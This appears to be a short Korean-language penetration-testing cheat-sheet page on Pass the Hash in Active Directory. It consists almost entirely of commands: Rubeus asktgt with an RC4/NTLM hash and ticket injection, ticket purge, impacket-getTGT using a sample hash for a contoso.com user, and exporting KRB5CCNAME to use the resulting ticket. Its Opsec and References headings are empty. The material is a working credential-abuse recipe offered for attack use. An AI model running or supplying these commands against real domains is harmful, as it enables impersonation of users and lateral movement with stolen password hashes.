Pass the Hash
Pass the Hash
Abuse
# 사용자의 NTLM로 TGT 생성
.\Rubeus.exe asktgt /user:'<username>' /rc4:'<hash>' /nowrap /ptt /force /opsec /domain:'<netbios>'
# 티켓 삭제
.\Rubeus.exe purge# 사용자의 NTLM로 TGT 생성
impacket-getTGT contoso.com/Mick3y -hashes :2b576acbe6bcfda7294d6bd18041b8fe
# 환경변수 등록
export KRB5CCNAME=Mick3y.ccache
# 환경변수 삭제
unset KRB5CCNAMEOpsec


References
Last updated

